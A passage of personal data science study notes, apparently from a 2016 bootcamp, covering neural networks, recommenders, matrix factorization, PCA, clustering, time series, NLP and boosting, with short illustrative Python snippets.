structure\n - Action of taking a bunch of grouped data and combining it.\n - Network/Bandwidth is a limited resource in Map Reduce operations. 
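As a concrete single-machine sketch of the Map -> shuffle/sort -> Reduce flow described above (the corpus and variable names are made up for illustration; a real job would run on a cluster, e.g. via Hadoop streaming):

```python
from collections import defaultdict

docs = ["the cat sat", "the cat ran"]          # stand-in corpus chunks

# Map: each chunk -> a sequence of (key, value) pairs
mapped = [(word, 1) for doc in docs for word in doc.split()]

# Shuffle/sort: group values by key -- this is the step that moves data
# across the network on a real cluster
grouped = defaultdict(list)
for word, count in mapped:
    grouped[word].append(count)

# Reduce: combine all values associated with each key
word_counts = {word: sum(counts) for word, counts in grouped.items()}
print(word_counts)   # {'the': 2, 'cat': 2, 'sat': 1, 'ran': 1}
```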
So try to decrease the amount of data that you need to move/sort around the framework.\n - HIVE - SQL like language to query Map Reduce\n - APACHE HBASE -\n - Pig - high level language over Map Reduce\n\n\n\n\n160718 Amazon Web Services\n 1. Instance type:\n m4, general purpose, balance between network, CPU etc\n c, denotes compute\n g, denotes GPU based instances\n\n\n160712 Neural Networks\n 1. Dense layer, or fully connected layer: proximal layer has connections between every node in that layer and the input layer\n - Each node in each layer is a function of the outputs of the input layer\n - Place a different weight on each connection between the input layer and layer 1\n - Can initialize with a random weight\n - So you have a matrix of weights between every node in each layer\n - Goal is to learn the weights via training\n - So the function of a given node is then the matrix-wise dot product of the weights for that layer dot-product the input layer (preceding).\n - There is additionally an \"activation function\" that defines how to combine the inputs with the weights from each node of the layer. Usually define the function uniformly across the layer, and often across the neural network.\n - Several functions work better than others for this purpose\n - Constraint is that the function must be differentiable\n - Predefine neural network structure and functions etc.\n - Weights are then learned via \"training\" to minimize the output loss function\n - SSS20 Neural Network Architecture\n - Layer 2, for example, will take the augmented values of layer 1, run it through the activation function, and output to the next layer\n - Loss function is put on the output (must be differentiable) to determine the loss of true vs. predicted, and then change weights to minimize the loss\n 2. Optimizing Weights:\n - LEARN MORE HERE: ultimately you can describe the impact a given weight has on the ultimate loss function as a function of distal layers/weights.\n - So you send a \"batch\" of x's through the network, obtain a loss function, then\n - backpropagation is using that loss to calculate the optimal weights to minimize loss.\n - Then send another batch through, repeat.\n - Ultimately, the network will see all the data in various batches\n 3. General\n - Neural networks require a lot of data to train, and underperform with smaller data sets\n - But performance tends to continue to increase as data gets bigger\n - Width of the network describes the number of nodes per layer\n - Rules of thumb:\n - First go for depth of the network\n - Once can do that (errors etc), can increase width of the layer\n - Want to \"overfit the data\", then impose regularization\n - Drop out: is a value x btw 0-1, and will ignore x weights during forward and back propagation, to \"force the net to adjust the weight on a future prop if it is really important\"\n - Learning Rate: decreasing the learning rate per node (similar to in trees)\n 4. Convolutional Neural Networks\n - Good when inputs are correlated with one another; ie pixels in an image\n - Convolutions are smaller matrices that act as a filter when you pass it over the larger image.\n - Train a neural network to learn the smaller matrices/filters. 
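A minimal sketch of such an architecture in Keras (the library choice, 28x28 input shape, layer sizes, and hyperparameters are illustrative assumptions, not from the lecture):

```python
from tensorflow.keras import layers, models

model = models.Sequential([
    layers.Conv2D(32, (3, 3), activation="relu", input_shape=(28, 28, 1)),  # learn 32 3x3 filters
    layers.MaxPooling2D((2, 2)),             # pooling layer after the conv layer
    layers.Flatten(),                        # "unravel" into fully-connected layers
    layers.Dense(64, activation="relu"),
    layers.Dropout(0.5),                     # dropout regularization
    layers.Dense(10, activation="softmax"),  # class probabilities
])
model.compile(optimizer="adam", loss="categorical_crossentropy", metrics=["accuracy"])
# Filters and weights are then learned batch by batch via backpropagation, e.g.:
# model.fit(X_train, y_train, batch_size=128, epochs=10)
```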
Similar to learning the weights in the above NN\n - Note that this is not a dense network, only some nodes are affecting subsequent nodes\n - After a convolutional layer, often do a \"Pooling\" layer (ie Max Pooling), which uses a small convolution ie 3x3, then takes the max of that area, then creates another smaller layer (causes significant information degradation). Tries to solve the problem of things not appearing in the exact same places, pooling tries to solve this.\n - Can intersperse several convolutional layers and a pooling layer, and repeat as needed.\n - In subsequent layers of the network, each convolution is akin to a node, and the convolutions themselves are like weights that are changed with each forward/back-propagation. Therefore, each layer can \"learn\" more complex interactions between the features, again such that you decrease the loss function.\n - After the last convolutional layer, \"unravel\" the features that come out of the last layer into one or two fully-connected layers before giving the output predictions.\n 5. General learnings from trying (in discussion with Carey):\n A. First step in building a neural net is to build it such that you can show that it is \"learning\" and thus overfitting.\n - Do this by building it as deep first then wide second as possible, and adding the relevant filters / max-pooling (or other pooling layer) that make sense conceptually given the problem.\n - Then can feed it a subset of the training data (in replicate, ie x 10) and see if it perfectly predicts the output ie 100% accuracy. This suggests that it is overfitting and thus learning.\n - Can then impose \"regularization\" through increasing dropout, decreasing layers, increasing filters etc, and test the performance of this (ie how well you are controlling for overfitting) using cross validation.\n - Then ultimately once you've adequately regularized and adjusted for overfitting as suggested by cross-validation, then feed it test data and see how it does.\n - Recall that you need to take the complexity of the data into account in the design of your model. Ie if it is a simple dataset, you shouldn't build a deep network, otherwise you will overfit. So prune layers.\n B. Other things\n - Its reasonable to use relu function for all upper layers, and then relevant activation for the final layer, such as sigmoid for a binary outcome.\n - There is a train of thought that rather than initializing weights with the random uniform, perhaps use a gaussian distribution which may improve performance. Look into this and consider implementing.\n\n\n160707 Recommenders: Collaborative Filtering Recommenders\n 1. Collaborative Filtering\n - considers past users behavior to predict missing ratings\n - other types of recommending:\n - popularity, independent of user's themselves\n - content based: based on the properties/characteristic of an item and past user's behavior\n - How to compare similarity?: User to user or item to item. In a setting where there are more users than items, calculating item to item similarity requires less computations.\n - Also, user rows are sparsely populated. Whereas items are more densely populated\n - Similarity comparison:\n - Euclidean distance in practice doesn't work well as a comparison of similarity\n - Pearson Correlation: measures how much two vectors deviate from their mean together. Isn't sensitive to users who consistently rate low or high\n - Cosine distance: Measures the angle between two vectors. 
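For example, with plain numpy (toy vectors; sklearn's `cosine_similarity` in `sklearn.metrics.pairwise` gives the same result):

```python
import numpy as np

def cosine_sim(u, v):
    # cos(theta) = (u . v) / (||u|| * ||v||)
    return np.dot(u, v) / (np.linalg.norm(u) * np.linalg.norm(v))

a = np.array([1, 3, 0, 5])
b = np.array([2, 6, 0, 10])   # same direction as a, twice the length
c = np.array([5, 0, 4, 0])

print(cosine_sim(a, b))   # 1.0 -> identical direction despite different magnitudes
print(cosine_sim(a, c))   # ~0.13 -> nearly orthogonal, dissimilar
```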
Equivalent to Pearson correlation coefficient when vectors are mean centered.\n - Jaccard Similarity: Usable when you don't have ratings but have boolean data. Measures similarity between two sets.\n 2. Predicting Ratings\n - SSS16 Predicting Ratings\n - to predict rating for item i: (the sum of similarities between items i and j times the user's true rating of item j) / sum of the similarities of items i and j.\n - TO improve performance, can restrain calculations to items most similar to i.\n 3. Recommenders are hard to validate:\n - often deploy in A/B testing manner and see if it leads to more conversions\n - can do k-fold cross validation\n - Error metric: RMSE, though this considers how far off you are with all your ratings.\n - Precision: proportion of top-n documents that are relevant \n - Recall: proportion of relevant items in the top n.\n - To do cross validation for a recommender:\n - keep a percentage of your cells that have data (of the sparse matrix) and hold this as out as your test set. Then do cross-validation on the remaining (training set), and you can get an approximation of error using your held out test set. This is under the assumption that there is an ADDITIONAL test set that you will obtain a final score on (ie in a competition style setting).\n 4. Review of SVD/ PCA\n - All decomposed matrices (ie all axes of PCA) will be orthonormal.\n - SVD is not very good for very sparse matrices, since you need to fill in missing values, and so the algorithm will try to fit to those values (ie 0) which doesn't perform well.\n - NMF can be a good option for recommending systems using sparse matrices.\n - The decomposed matrices W*H (from V = W*H)\n - One thing you need to do is to impose a regularization factor (the right side of the equation), so given the missing values, some values are not necessarily seen? ? so you need to impose a constraint on them using the normalization factor.\n - SSS17 NMF equation for recommendation\n 5. NMF\n - Much of the observed variation in rating values is due to item bias and user bias. Capture this using a few bias terms: overall bias of the rating by the user i for item j:: b-ij = mean rating + b-i + b-j. bi = bias of the user on average; bj = item's average deviation from overall average.\n - Thus the cost function can be updated to reflect the bias equation.\n - SSS18 NMF Bias cost function\n\n\n\n\n160706\n 1. Non Negative Matrix Factorization\n - At a high level: Non negative matrix factorization is a method of dimensionality reduction, whereby you break down a single matrix into two component matrices, but which have inner dimensions of \"k\". K defines the pre-defined k number of latent features you wish to find/break down your original matrix into.\n - defining k here is similar to all other unsupervised learning techniques whereby you can define how many \"topics\" or categories you aim to find using the method.\n - It is similar to PCA and SVD, except in PCA/SVD, the two resulting component vectors (specified by the size of latent features k you are seeking...ie the inner dimensions of the component matrices) are by definition orthogonal, whereas in NMF, they do not have to be (and thus often are not)\n - SVD find orthogonal features between two matrices whereas NMF does not.\n - Operationally, NMF finds the decomposed matrices W and H via an optimizatio method called alternative least squares: You have a target vector V shape (n x m). You initialize matrix W to be random values, shape (n x k). 
You then calculate matrix H shape (k x m) to minimize the least squares between W and V.\n - You then fix H, and re calculate W to minimize least squares between H and V.\n - Repeat alternating until least squares is minimized beyond a threshold or for a set number of iterations.\n - V = W * H\n - SSS19 NMF equation\n - All values of V must be non-negative\n - In NMF You \"clip\" the values of the resulting matrices such that they are non-negative values\n - NMF decomposes feature matrix X (n x m) into W and H, which are not likely orthonormal\n - W is (n x k) represents the strength of each latent feature for each observation\n - H is (k x m) represents strength of each observed feature for each latent feature\n - k is number of latent features\n - W and H are learned via alternating least squares (ALS) as above\n - ALS is biconvex, so you don't always find the global optima. Better optima can be found with strategic initializations (like k means) or from multiple random initializations\n - NMF is an approximate factorization, and has non-unique solutions. Will find a local optima with non-convex RSS optimization\n - k features is a tunable hyperparameter\n 2. Extensions\n - Regularization with NMF when using ALS\n - In most cases of using NMF as a recommending system, you have data which is very sparse: ie data on many more items (movies, amazon items etc) than number of users--further the actual cells in this matrix that are occupied are the small minority.\n - Given this, for SVD, you are forced to fill in the values with zeros or something else, to which the algorithm subsequent fits, which doesn't make much sense and thus does not perform well.\n - with NMF, however, you don't have to impute missing values.\n - SSS17 NMF equation for recommendation\n - However, since W and H are randomly initialized in NMF, all values in these matrices are filled. Given the sparsity of the data as explained, this increases the likelihood that you will overfit the data given the simple RMS cost function.\n - Thus, adding regularization to the cost function (right side of the equation in SSS17), is the practical reality of using NMF on real world recommender-type data sets.\n - This regularized cost will serve to impose greater penalty on the wi and hj values that overfit the data, and this is applied DURING the ALS fitting process.\n - lambda is a hyperparameter which you can tune, ie via graph search, comparing resulting models via RMSE error or something similar.\n - In graphmodels, lambda is a hyperparameter as such, which you can tune.\n - Can choose K with a cross-validation process \n - cost function can be other than ALS such as information gain, gini index etc\n - See tomomorrow's lecture for info on BIAS accomodation via NMF\n 3. Project tips:\n - \"interesting\"\n - Focused question\n\n\n160705 Dimensionality Reduction\n 1. Principal Component Analysis\n - With many dimensions, many features are likely correlated, so if there is highly correlated data, there is redundant information. 
So we try to decorrelate the input vectors.\n - The covariance matrix of a feature space usually has a lot of large values\n - The ideal is to find the covariance matrix where all non-diagonal values are 0.\n - We can do this by defining that all of our PCA dimensions will be ORTHONORMAL to each other, thus by definition we remove all covariance from the covariance matrix between these dimensions.\n - ORTHONORMAL means that all vectors are unit vectors and are orthogonal to each other (dop product = 0)\n - The main idea is attempt to find a covariance matrix where all variables except the diagonal have minimal covariance with other variables, which means there is no relationship between the features\n - We can transform the matrix to make this happen\n - This corresponds to finding a new set of axes that better fit the data\n - Start by defining the first dimension to capture the maximal variance in the data\n - The second dimension (of this first component) is defined to be orthogonal to the first, so there is no covariance between the two features, given this definition\n - Our goal with PCA is to find the transformation matrix V which when applied to original data X which gives us our ideal covariance matrix.\n - In other words, to get the transformation, we need to find the eigenvalues and eigenvectors of M-T M.\n - The Eigenvectors are the new basis; the eigenvalues are the variance in each of these dimensions.\n - To reduce the number of dimensions to m << p, can get rid of the smallest lambdas\n - To determine how many features to keep , can look at the scree plot, plotting the variances (eigenvalues) in increasing order. Choose the elbow or wherever the most information is captured.\n - An eigenvector v of a linear transformation T is a non-zero vector that, when T is applied to it, does not change direction. Applying T to the eigenvector only scales the eigenvector by the scalar value lambda, called the eigenvalue.\n - T(v) = Lambda(v)\n - Each principal component projection is defined such that each tries to capture as much variance of the original data set.\n 2. Curse of dimensionality\n - Any technique that involves a distance metric suffers from this, which is that as features increase, the distance between them grows without bounds.\n - Heuristic, for a model to be effective you need the distance between points to be less than some value d. Thus, you need 1/d^p data points, if you have p dimensions.\n 3. Singular Value Decomposition: A method to help perform calculations necessary for PCA\n - Since calculating the eigenvalues and eigenvectors is difficult, the SVD technique allows for more efficient computation. SVD can also help find latent features.\n - SVD is based on the following: every matrix has a unique decomposition in the following form: X = U E V.T\n - U and V are orthonormal matrices (constraint imposed by the definition of PCA)\n - E is a diagonal matrix of positive values; can reduce dimensions by sending the smaller diagonals to zero. Thus this is the method of dimensionality reduction via SVD.\n - Plotting the scree plot and determining the elbow is a way to determine how many features/dimensions to keep.\n - Allows you to calculate the eigenvector/eigenvalues for matrices, without computing the matrices themselves (computationally intensive).\n - This is in fact what sklearn does under the hood to calculate PCA\n 4. 
Latent Features\n - Structure in the data that you don't observe directly\n - SVD can help discover latent features\n - In SVD/PCA, you find all the orthonormal matrices for every category of features in your data; so you usually end up with the same number of latent \"features\" as your original feature set.\n - However, you can then calculate the information gain from each given feature, rank them, and then choose to keep only 3 or 5 or whatever. This varies from NMF in that in NMF you pre-specificy the k number of latent features you wish to find at the beginning of the procedure.\n\n\n\n160701 K Means Clustering/Hierarchical Clustering\n 1. Supervised vs Unsupervised\n - The loss function (described by the (y - y-hat), ie MSE etc) effectively \"supervises\" our learning of the relationship between y = f(x).\n - In unsupervised learning. Can still try to discern structure from the x data.\n - Unsupervised learning is particularly sensitive to selecting the right model, and deciding which data goes into the model.\n 2. Clustering\n - Dividing data into distinct subgroups. Since we don't have labels, choosing the value of k is of particular importance, since you never know the truth and can't cross-validate to infer the best k\n 3. K Means\n - We want within-cluster variation to be small\n - Want assignment of points to groups so within cluster variation is the smallest. So one way is to minimize the squared euclidean distance between all pairwise points\n - K means procedure:\n - start by randomly assigning each data point to a cluster.\n - computer the centroid of the cluster\n - re-assign the data points to the nearest centroid\n - recompute centroid\n - reassign data points...and repeat until no further change.\n - Techniques to choose K, or to \"learn\" k\n - Elbow Method: Compute within cluster variation (sum of squares) for several values of K. Thus there often will be a k after which the decrease in variation decreases. So you pick the elbow. But there is not always an obvious elbow on which to pick k.\n - GAP statistics\n - Silhouette Coefficient\n - Curse of Dimensionality\n - Since we're computing distances between points in k means, in high dimensional spaces, distances become far apart in high dimensions.\n - Amount of data needed to compensate for high dimensional data increases quickly\n 4. Hierarchical Clustering\n - Algorithm: each point is its own cluster, merge closest clusters, and end when all points are in a single cluster.\n - don't have to choose k at the start, number of groups depends on where we cut the dendrogram\n - Several distance measures to consider using, resulting in different dendrograms. Most common are complete and average\n\n\n160630 Time Series\n 1. Reading notes:\n 1. One main goal is to account for the correlated nature of points, which explains their relative \"smoothness\" in time series data. So try to describe some mathematical model to describe the appearance of the data observed.\n 2. Methods include using white noise,\n -moving averages: replaces a white noise series w-sub-t with an average of its current value and its immediate neighbors past and future.\n - Autoregressive- uses the two previous values\n - Random Walk with Drift - random white noise movement with a drift (slope?) factor\n 2. 
Time Series Lecture: analysis of experimental datat observed over time, usually equally spaced.\n - Conventional statistical methods are restricted given the correlation of adjacent time points; given assumption of independent and identically distributed data\n - Overal: find a pattern from past data at hand, and forcast into the future\n - Assumptions is that the pattern will continue\n 3. Components of a time series\n - Trend - long run up and down of the series.\n - Cycle: upward/downward around the trend\n - Seasonal Variations: patterns following yearly patterns\n - Irregular Variation: remaining erratic movements that can not be accounted for\n - Goal is to estimate the trend, cycle, seasonal components of a time series so all that's left is irregular fluctuations\n 4. Time Series Regression\n - Linear regression featurized time: discarding assumption of normalized residuals\n - Literally add a factor to the linear model for trend\n - Similarly model seasonal variable using seasonal or seasonal-dummy variables.\n - Model L seasons in SNsubT using L-1 indicator variables S1 through SL-1\n - SSS10 Time Series Trend Series\n - Binning of time series data (past) is informed by the goal of forecasting. What do you want to predict?\n - Additive Decomposition: y = TR + SN + CL + IR , defined as trend, seasonal, cyclical and irregular factors.\n - Estimate SN t by grouping seasons and averaging and making it zero scale.\n - Estimate TR t by subtracting out seasonalized estimates , and fit a standard regression\n - Estimate CL t by removing the season and trend, and perform a moving average\n - The average of irregular fluctuations will appx be zero\n - Estimate IR t by looking at the residual after removing the main components\n - We assume that hte pattern continues into the future and that there is no pattern in the irregular component: therefore we predict IR t to be zero, thus the point estimate of IR at time t is zero.\n - Thus forecast of point estimate at time t is y = tr + sn + cl (all sub t).\n - Can give a prediction interval y +/- B sub (t, alpha), B is the error bound in a prediction interval\n - Key assumption of additive decomposition is additive variation over time. If this doesn't hold and you can't stabilize the variance, can try multiplicative decomposition\n - Smoothing methods\n - Simple exponential smoothing: Used when there is no significant linear trend (ie slope), but mean is changing over time\n - If the mean remains constant, then the standard linear model can be used, giving equal weight to all time points\n - If mean is changing slowly may better capture trend if we can give more weight to more recent observations than older observations, which is simple exponential smooothing.\n - Optimize value of alpha (which weights most recent data value)\n - SSS11 Exponential Smoothing\n - SSS12 Exponential Smoothing equation: So for more distant observations (x from current), the weight (alpha(1-alpha)^x) gets driven to zero, so more recent observations have a higher weight\n - alpha is a hyperparameter to optimize by minimizing sum of squared error SSE\n - SSS13 The error bound for more distant observations (farther from today) will get larger. 
Since when alpha is large, the error term (Tau -1) x alpha squared gets driven to zero\n - Hold's Trend Corrected Exponential Smoothing : allows for modeling both a linear trend (slope) that changes over time\n - Allows modeling of the mean and the growth rate (slope or linear trend) to change with time.\n - Allows us to take int o account growth rate, by adding a factor \"b\".\n - thus have both alpha and gamma hyperparameters\n - SSS13-2 Holt's Exponential Smoothing\n - Holt Winter's Exponential Smoothing : adds a component of seasonality to the linear trend/slope.\n - Similar to Holts, but it additionally takes into account an additional seasonal factor\n - Note that you ned to have data of enough seasons in order for this to work\n 5. ARIMA:\n The Box-Jenkins Methodology applies autoregressive moving average models to find the best fit of time series based on past values.\n 1. Approach:\n - SSS13-3 ARIMA model approach\n - Model Identification\n\n - The autocorrelation function is the correlation between the current time and the time x times ago. Uses pearson correlation coefficient\n - Partial auto- correlation, is the correlation between two separated points with the effect of the intervening points conditioned out. Almost like multivaraible linear regression with intervening time points as variables.\n - SSS13-4 Partial Autocorrelation\n - See ipython notebook notes for examples of autocorrelation and partial autocorrelation plots SSS13-5 Autocorrelation/partial correlation plots\n - So note the first time point 0, correlation is 1 (since correlated with itself), but for autocorrelation, as you get farther out, correlation decreases.\n - For partial autocorrelation, after taking into account the first lag, the second lag actually has little additional correlation.\n - Stationary Time Series:\n - A time series for which the statistical behavior of a set of observations is identifical to that of the shifted set of observations for any collection of time points for any shift h (lag). This is a VERY STRONG ASSUMPTOIN.\n - So the weak stationary assumption is that this holds for the first two moments : mean and covariance (with it self h-lags away). These are less reliant on time.\n - In reality, most time series are not stationary.\n - So how to modify the time-series to improve the approximation of stationarity\n - Detrending - constraint 1\n - differencing - constraint 1\n - transformation - constraint 2\n - These are methods to try to turn nonstationary data into stationary data so we can model it using ARIMA, given the ARIMA asusmptions of stationary data\n - Use Autocorrelation (AC) or partial AC plots to compare the how well each method (detrending or differecing)\n - for deternding, plot the residuals on an autocorrelation plot to see whether you adequately removed autocorrelation\n - So keep examining autocorrelation plots to see whether you've adequately addressed the stationarity assumption using your methods above: deternding, differencing, transformation.\n - IN J&J example, needed to take log, difference and difference the seasonality (every 4th quarter), before we acheived statioarity.\n - NOte, detrending via linear regression may allow us to take into account multiple variables other than time in the modeling (since ARIMA can't do this).\n - Once we achieve stationarity, we take a look at the timepoint where decay is achieved at timepoint k. This will help determine how far back to consider correlation between observations.\n 6. 
Autoregresive Models :\n - Autoregressive-po models is based on the idea that the present value of the series can be explained as a function of the p past values. So use PACF plot to determine p, see slides.\n 7. Moving Average Model:\n - assumes that white noise is combined linearly to form the observed data.\n - based on prior errors\n - Use ACF plot to determine q,\n 8. Autoregressive Moving Average Model ARMA:\n - So ACF will identify the q parameter\n - PACF will identify the p parameter\n 9. ARIMA :\n - Additionally takes into account for d, the number of differences needed to achieve stationary\n - This then provides the model by whcih you can predict future values (your model can) as a function of x-prior data points and coefficients \n 10. Seasonal differences can also be modeled in S-ARIMA.\n 11. Fit the best candidate models and compare how models perform using AIC or BIC comparison\n 12. After lab learnings:\n A. It sounds like the approach is as follows: view the AC and PAC plots to get a sense of the k-units lag from the PAC (p) and the AC (q) plots.\n B. Next step is to make data stationary: Can play with detrending, but ultimately, it seems differencing is the better technique to try to achieve stationarity of the data. However, be aware of overdifferencing\n - you detrend (often) by fitting an OLS to the data, and plotting ACF, and PACF plots to the residuals\n - second order differencing is the equivalent of a second order derivative of the data\n C. Once you've achieved stationarity of the data via differencing and or detrending, then you need to determine the p and q parameters by looking at the PACF and ACF plots and noting lag.\n - if you notice lag in either PACF or ACF plots, these will inform the remaining parameters p and q respectively in your ARIMA model, based on the number of k-lag days you observe as significant in the plots before they drop within the error bounds.\n - Note that your choice of the seasonality parameter L will seem to (i believe) inform the numbers you choose for d and maybe little p/q, since if L is 7, then a D of 1 I believe suggests a 7x1 differencing that is significant.\n - Less clear on how to pick P/Q relative to p/q and even D relative to d.\n D. Then plug all these parameters into ARMIA and then tune further based on ACF and PACF plots until adequate.\n 4. Time Series Review Moses 7-5-16\n - For the p, partial autocorrelation, you'll only see the lag at that point (ie k=7), in contrast to the autocorrelation where you'll see the lag up TO that k value.\n -\n\n\n\n\n\n160629 Model Comparision summary\n 1. RF :\n - Fast, works well out of the box\n - Sensible feature importances\n - Accurate\n 2. Gradient Boosting\n - More accurate, but requires much more tuning of hyperparameters compared to RF\n - Partial dependency plots can try to get at the interpretability of the relative importance of the features\n 3. Logistic Regression\n - More interpretable\n - Con: Intperetabilty becomes harder with categorical variables and making dummy variables, because everything is with respect to the baseline...even for OTHER variables\n 4. Performance metric:\n - Choose based on priority to your application at hand: ie minimizing false negatives (ie churn), or other.\n - Recall\n - F1\n - Accuracy might have been bad in this situation because of the imbalanced classes (churn was 60%)\n - Accuracy may also be bad if there is a cost imbalance\n 5. Leakage: an example would be somehow leaving target data in a derived variable within the data. 
Ie calculating churn using last ride taken, and leaving in last ride taken.\n 6. Possible starter paramter ranges for grid search over Gradient Boosting Trees:\n learnign rate 0.1-0.01\n max depth 4-6\n min sample 3,17\n max features 1-0.1\n n_estimators 100\n 7. BIG UNDERSTANDINGS:\n - SSS14 CV and Test Train Split\n - cross validation is generally only ever used with training data. Use this to obtain an estimate of what your test error might be, without ever using your test data (until the very end) to train your model.\n - For grid search and cross_val_score, you only ever need to feed this training data. Never really feed it test data\n - Select best model after you've tuned your parameters by comparing cross_val_score on trainig data only.\n - Once you've selected your best model, THEN you can use that model (with set coefficients) on test data to obtain an estimate of test error. This generates the parameters of accuracy and or other relevant metrics that you can tell others about to describe your model.\n - Then, if desired, you can refit coefficients on the entire data set before using this to predict future data.\n\n\n\n160629 Michelle Career lecture\n 1. Resume ideas:\n Programming: Python, Pandas, Numpy, Scipy, sklearn, NLTK\n Visualization: Matplotlib, seaborn, plot.ly\n Databases: SQL, MongoDB\n Distributed Systems: Spark, MapReduce,\n\n\n160628 Intro to Natural Language Processing\n 1. Methods to featurize documents of text\n A. Bag of words: create a vector of word counts, regardless of punctuation, capitaliation\n - Order of words matter here\n - sklearn has a vectorizer fnction for bag of words\n - once documents have features vectorized, can compare documents\n - using euclidean distance, you look at vector-distance, which may not make intuitive sense in the sense of a vector of different length but pointing in the same direction\n - cosine similarity : looks at the direction of the vectors rather than length/distance. thus this is often a more useful classifier.\n - SSS8 Cosine similarity\n - Bag of words is naive, just word counts, with equal word having equal weighting. Sense that word counts should be adjusted based on frequency.\n B. \"TF*IDF\" : Term Frequency, Inverse Document Frequency:\n - Words in only in one document (rare), have higher weighting. Words found in every document have lower weighting.\n - Note, similar in equation to information/entropy from classification trees: ln(1/p).\n - Basically rank words based on amount of information gain\n - SSS9 Inverse Document Frequency\n - Often more useful than bag of words, sklearn has tfidf vectorizer\n C. Feature Engineering for text\n - Tokenize (to turn words into their category, perhaps changing posessives to original word, expanding contractions aren't to are not etc)\n - Remove stop words: removing words offering less information such as \"the,\" there are standard lists of stop words.\n - Stemming : walked -> walk\n - Lemmatizing: people -> person. There are standard lemmatizers\n - N-grams: tokenizing several words together: \"the cat\", \"cat in\". Serves to expand the feature space. Takes into account word proximity\n - Skip Grams: does N-grams, but skips x words. So categorizes proximity of words.\n - Dependency/probabalistic parsing: takes into account word dependencies on each other, some grammatical/syntactic associations between words\n\n160628 Naive Bayes Lectures\n 1. 
Maximum A Posteriori : predicts the outcome most likely under the posterior distribution.\n - Given a prior distribution P(H), and the likelihood of observing some data X across a set of hypotheses, we predict the hypothesis that maximizes the probability of P(H given X).\n - Since P(X) does not depend on the hypothesis, MAP estimation works by maximizing the numerator P(X|H)xP(H). \n - SSS7 Maximum A Posteriori\n - Conditional independence only holds between events A and B when C is true. It is a key assumption about the features in the Naive Bayes Model. A and B are not independent when C is not true.\n - Bayes is a Generative model:\n - Prior models are discriminative model, estimating the conditional distribution P(Y|X).\n - Generative models: estimates the joint distribution of P(Y|X) and P(X). So in addition to estimating the distribution of the target, is also estimates the population distribution of the features X.\n - This estimated joint distribution allows us to generate new synthetic data by sampling from the join distribution.\n - Naive assumption of Naive bayes: that each of the features are conditionally independent given Y. Though this is not always true, this does not generally change the MAP estimate.\n 2. Applying Naive Bayes to Document classification\n - Multinomial event model. Assumes that a category of ie book type have a higher probability of predictors ie words, than other types.\n - The Prior Distribution is estimated from a sample or corpus of documents. The probability of any class is estimated to be those from the sample population.\n - The conditional distribution represent the frequency of each vocabulary word in each class of document. Estimated by counting number of times a word shows up in a given class, divided by the total length of documents in that class. (So frequency of words in a give class of document).\n - The naive bayes model for text classification is the product of the conditional probabilities of each word given a type of document and the probability of that document (the product over all words). And the hypothesized document class that maximizes this probability is what is predicted by the Naive Bayes model.\n - Risk of numerical underflow. Since each probability in Naive Bayes for a given document (ie 2000 words) is small, there is a risk that each probability is too small for a computer to easily represent.\n - Log transformation of the probabilities can get around this.\n - Laplace Smoothing. Sometimes new words are found in the test set did not appear in that class of the training set. Thus, the solution is to add 1 to each word's frequency, to get around this.\n - Unknown words: If a new words was not seen in any class throughout the trainign set, this can also cause a problem. Can add a generic unknown word to the vocabulary and give it a small probability.\n - In theory, can also use a number of distributions for Naive Bayes.\n - Naive Bayes Pros:\n - Good with wide data, with more features than observations.\n - Fast to train, and good at online learning\n - Simple to implement.\n - Cons:\n - Can be hampered by correlated features\n - Probabalistic estimates are unreliable when class estimates are correct given the naive assumption.\n - Some other models can perform better, with better accuracy.\n\n\n160627 Web Scraping\n 1. 
NoSQL databases\n - Not Only SQL: MongoDB is a flavor of NoSQL.\n - NoSQL paradigm is schemaless, which is an advantage in some cases\n - MongoDB is a document-oriented DBMS\n - Collections in Mongo are like dictionaries in python\n - JSON Javascript Object Notation, formalized formatting for their objects/dictionaries.\n - Can have data redundancies in documents (non-normalized data), as Mongo does not enforce normalized data\n - A change to database generally results in needing to change many documents\n - Since there is redundancy, simple queries are generally faster, but complex queries are often slower.\n\n\n\n\n160624 Chat with Michelle\n\n- To get valuation, ROT is to multiply seed amount by 5 (ie they got 20% of the company’s total estimated valuation)\n- For A round, can multiply by 3-4, ie investors got 25%-30% of the company.\n- But basically try to ask for the actual valuation or preferred share stock price to to calculate tax burden.\n\n\n160624 Imbalanced classes\n--> Ways around it:\n 1. Cost sensitive learning\n - Thresholding: plot expected profit over each threshold, then can select the threshold with the highest profit\n - Some models have explicit cost functions that can be modified to incorporate classification cost\n - less frequently used\n 2. Sampling methods\n - Undersampling: randomly discards majority class observations\n - Works, and can reduce runtime on large datasets, but discards potentially important observations.\n - Oversampling: randomly replicate minority class observations to balance the training sample\n - Doesn't discard information, but is likely to overfit.\n - SMOTE : Synthetic Minority Oversampling Technique: Generates new observations from minority class.\n - Basically takes a random KNN of the minority class\n - In the imaginary x1-x2 (can be extended to x-i) grid space for the two selected points, it will generate a random point somewhere between those two points, varying on all features x1-xi.\n - Create x amount of these points to \"oversample\" the minority class.\n - CV to tune the k value of KNN for smote\n - Sort of assumes minority class points are clustered near each other, and can run into problems when they are not.\n - If minority class points are also clustered around the majority class points, ddthe SMOTE procedure could definitely weaken the ability to classify.\n - So there are certainly limitations with this method\n 3. Review of Metrics\n - F1 score: harmonic mean of precision and recall\n - ROC: If you know cost/benefit matrix, or a specific target precision/recall don't use AUC, since you can choose threshold to maximize PROFIT or those specific metrics.\n - AUC is more useful when exploring models to choose the best one\n\n\n160623 Boosting\n 1. Bias Variance Tradeoff:\n A. For regression trees:\n - Decrease bias by building deep trees\n - Decrease variance by using bootstrapped datasets such as in bagging, limiting features available at each node, pruning the tree, and majority vote ensembeling votes from various trees (averaging across trees decreases variance)\n B. Test methods of decreasing bias or variance by CV\n - In bagged decision trees, can use out of bag estimation to try to estimate external generalizability.\n 2. Boosting Big Picture\n A. Attempts to make certain trees \"become experts\" in certain aspects of the data\n B. Boosting combines a sequence of weak learners to form a strong learner. Force it to be weak by limiting how deep it can be.\n C. Each tree learner fits error from the prior learner. 
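A bare-bones sketch of that idea for regression with squared error, fitting each shallow tree to the current residuals (tree depth, learning rate, and number of trees here are illustrative choices):

```python
import numpy as np
from sklearn.tree import DecisionTreeRegressor

def fit_gbm(X, y, n_trees=100, learning_rate=0.1, max_depth=3):
    pred = np.full(len(y), y.mean())       # start from a constant prediction
    trees = []
    for _ in range(n_trees):
        residuals = y - pred               # what the ensemble still gets wrong
        tree = DecisionTreeRegressor(max_depth=max_depth).fit(X, residuals)
        pred += learning_rate * tree.predict(X)   # shrink each tree's contribution
        trees.append(tree)
    return y.mean(), trees

def predict_gbm(base, trees, X, learning_rate=0.1):
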